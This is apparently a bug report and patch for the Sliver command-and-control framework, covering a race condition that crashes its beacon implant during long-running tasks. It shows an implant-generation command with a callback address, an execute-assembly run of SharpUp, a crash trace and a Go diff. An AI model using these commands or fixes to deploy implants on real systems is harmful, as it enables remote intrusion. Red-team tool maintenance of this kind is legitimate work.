Beacon panic (race condition) when task duration exceeds check-in interval

There is a race condition in `runner.go` when running in Beacon mode. If a task (such as execute-assembly) takes longer to execute than the configured beacon Interval, the beacon process panics and dies.

This occurs because the beacon loop spawns concurrent goroutines that share the same underlying connection state. When a new check-in cycle begins while a previous task is still running, the new cycle closes the connection, causing the running task to panic when it attempts to write its results to the now-closed/nil connection.


**To Reproduce**
Steps to reproduce the behavior:
```bash
# Generate a Beacon implant (e.g., windows/amd64, mtls).
generate beacon --mtls 192.168.1.14:443 --os windows -e --skip-symbols --debug -S 5 -J 1 -s /tmp/sliver.exe

#  Execute a long-running task that exceeds the interval time.
execute-assembly  /opt/useful/SharpCollection/NetFramework_4.7_x64/SharpUp.exe audit

```

- causes the beacon to panic
```go
2026/01/03 15:11:12 runner.go:241: [beacon] closing ...
2026/01/03 15:11:13 task_windows.go:483: [!] Error: <nil>, code: 259
2026/01/03 15:11:14 task_windows.go:483: [!] Error: <nil>, code: 259
2026/01/03 15:11:15 task_windows.go:483: [!] Error: <nil>, code: 259
2026/01/03 15:11:16 task_windows.go:483: [!] Error: <nil>, code: 0
2026/01/03 15:11:16 runner.go:352: [beacon] task completed (id: 8341822665026898661)
2026/01/03 15:11:16 runner.go:387: [beacon] all tasks completed, sending results to server
2026/01/03 15:11:16 runner.go:241: [beacon] closing ...
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x0 pc=0x7ff717d28c7b]

goroutine 84 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc000020200, 0x4, 0x40})
        crypto/tls/conn.go:1206 +0x5b
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0003b01e0)
        github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:97 +0x305
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0003b01e0)
        github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x34
github.com/bishopfox/sliver/implant/sliver/runner.beaconMain(0xc000035f28, {0xc24e865d34ea8933, 0xe0a8023d0, 0x7ff7188f1a80})
        github.com/bishopfox/sliver/implant/sliver/runner/runner.go:312 +0xf02
github.com/bishopfox/sliver/implant/sliver/runner.beaconMainLoop.func2()
        github.com/bishopfox/sliver/implant/sliver/runner/runner.go:200 +0xa5
created by github.com/bishopfox/sliver/implant/sliver/runner.beaconMainLoop in goroutine 1
        github.com/bishopfox/sliver/implant/sliver/runner/runner.go:190 +0x83f
```

### Cause

The loop in the `beaconMainLoop` uses `go func()` to spawn the check-in logic (`beaconMain`) while simultaneously using `time.After(duration)` to schedule the next loop iteration.


1. **Iteration 1:** `beaconMain` starts. It executes a long task (holding the connection open).
2. **Timer Expires:** The select statement unblocks after duration.
3. **Iteration 2:** The loop restarts and spawns a **second** goroutine.
4. **Conflict:** The second goroutine calls `beaconMain` -> `beacon.Start()` -> `beacon.Close()`.
    - `beacon.Close()` sets the underlying connection on the shared beacon struct to nil (or closes the socket).
5. **Panic:** The **first** goroutine finishes its long task and calls beacon.Send(). It attempts to write to the connection closed by Iteration 2, resulting in a nil pointer dereference in the transport layer.

--- a/implant/sliver/runner/runner.go
+++ b/implant/sliver/runner/runner.go
@@ -251,17 +251,19 @@ func beaconMainLoop(beacon *transports.Beacon) error {
 	time.Sleep(time.Second)
 	beacon.Close()
 
-	// BeaconMain - Is executed in it's own goroutine as the function will block
-	// until all tasks complete (in success or failure), if a task handler blocks
-	// forever it will simply block this set of tasks instead of the entire beacon
+	// BeaconMain - Tasks run in background goroutines, check-ins happen on schedule
+	// Results are collected and sent on subsequent check-ins
+	pendingResults := make(chan *sliverpb.Envelope, 100)
 	errors := make(chan error)
 	shortCircuit := make(chan struct{})
+
 	for {
 		duration := beacon.Duration()
 		nextCheckin = time.Now().Add(duration)
+
 		go func() {
 			oldInterval := beacon.Interval()
-			err := beaconMain(beacon, nextCheckin)
+			err := beaconMain(beacon, nextCheckin, pendingResults)
 			if err != nil {
 				// {{if .Config.Debug}}
 				log.Printf("[beacon] main error: %v", nextCheckin)
@@ -289,7 +291,7 @@ func beaconMainLoop(beacon *transports.Beacon) error {
 	return nil
 }
 
-func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
+func beaconMain(beacon *transports.Beacon, nextCheckin time.Time, pendingResults chan *sliverpb.Envelope) error {
 	err := beacon.Start()
 	if err != nil {
 		// {{if .Config.Debug}}
@@ -304,12 +306,26 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 		time.Sleep(time.Second)
 		beacon.Close()
 	}()
+
+	// Collect any pending results from background tasks
+	var completedResults []*sliverpb.Envelope
+collecting:
+	for {
+		select {
+		case result := <-pendingResults:
+			completedResults = append(completedResults, result)
+		default:
+			break collecting
+		}
+	}
+
 	// {{if .Config.Debug}}
-	log.Printf("[beacon] sending check in ...")
+	log.Printf("[beacon] sending check in with %d pending results...", len(completedResults))
 	// {{end}}
 	err = beacon.Send(wrapEnvelope(sliverpb.MsgBeaconTasks, &sliverpb.BeaconTasks{
 		ID:          InstanceID,
 		NextCheckin: int64(beacon.Duration().Seconds()),
+		Tasks:       completedResults,
 	}))
 	if err != nil {
 		// {{if .Config.Debug}}
@@ -361,28 +377,79 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 		}
 	}
 
-	// ensure extensions are registered before they are called
-	var results []*sliverpb.Envelope
+	// Dispatch tasks to background - results sent to pendingResults as each completes
+	// Extensions must be registered synchronously before other tasks can use them
 	for _, r := range beaconHandleTasklist(tasksExtensionRegister) {
-		results = append(results, r)
-	}
-	for _, r := range beaconHandleTasklist(tasksOther) {
-		results = append(results, r)
+		pendingResults <- r
 	}
 
-	err = beacon.Send(wrapEnvelope(sliverpb.MsgBeaconTasks, &sliverpb.BeaconTasks{
-		ID:    InstanceID,
-		Tasks: results,
-	}))
-	if err != nil {
-		// {{if .Config.Debug}}
-		log.Printf("[beacon] error sending results %s", err)
-		// {{end}}
-	}
+	// Dispatch other tasks individually - each sends its result when done
+	beaconDispatchTasks(tasksOther, pendingResults)
+
 	// {{if .Config.Debug}}
-	log.Printf("[beacon] all results sent to server, cleanup ...")
+	log.Printf("[beacon] tasks dispatched to background, check-in complete")
 	// {{end}}
 	return nil
+}
+
+// beaconDispatchTasks dispatches tasks to run in background, sending results as each completes
+func beaconDispatchTasks(tasks []*sliverpb.Envelope, pendingResults chan *sliverpb.Envelope) {
+	sysHandlers := handlers.GetSystemHandlers()
+	specHandlers := handlers.GetKillHandlers()
+
+	for _, task := range tasks {
+		// {{if .Config.Debug}}
+		log.Printf("[beacon] dispatching task %d", task.Type)
+		// {{end}}
+		if handler, ok := sysHandlers[task.Type]; ok {
+			data := task.Data
+			taskID := task.ID
+			// {{if eq .Config.GOOS "windows" }}
+			go func() {
+				handlers.WrapperHandler(handler, data, func(data []byte, err error) {
+					// {{if .Config.Debug}}
+					if err != nil {
+						log.Printf("[beacon] handler function returned an error: %s", err)
+					}
+					log.Printf("[beacon] task completed (id: %d)", taskID)
+					// {{end}}
+					pendingResults <- &sliverpb.Envelope{
+						ID:   taskID,
+						Data: data,
+					}
+				})
+			}()
+			//  {{else}}
+			go func() {
+				handler(data, func(data []byte, err error) {
+					// {{if .Config.Debug}}
+					if err != nil {
+						log.Printf("[beacon] handler function returned an error: %s", err)
+					}
+					log.Printf("[beacon] task completed (id: %d)", taskID)
+					// {{end}}
+					pendingResults <- &sliverpb.Envelope{
+						ID:   taskID,
+						Data: data,
+					}
+				})
+			}()
+			// {{end}}
+		} else if task.Type == sliverpb.MsgOpenSession {
+			go openSessionHandler(task.Data)
+			pendingResults <- &sliverpb.Envelope{
+				ID:   task.ID,
+				Data: []byte{},
+			}
+		} else if handler, ok := specHandlers[task.Type]; ok {
+			go handler(task.Data, nil)
+		} else {
+			pendingResults <- &sliverpb.Envelope{
+				ID:                 task.ID,
+				UnknownMessageType: true,
+			}
+		}
+	}
 }
 
 func beaconHandleTasklist(tasks []*sliverpb.Envelope) []*sliverpb.Envelope {

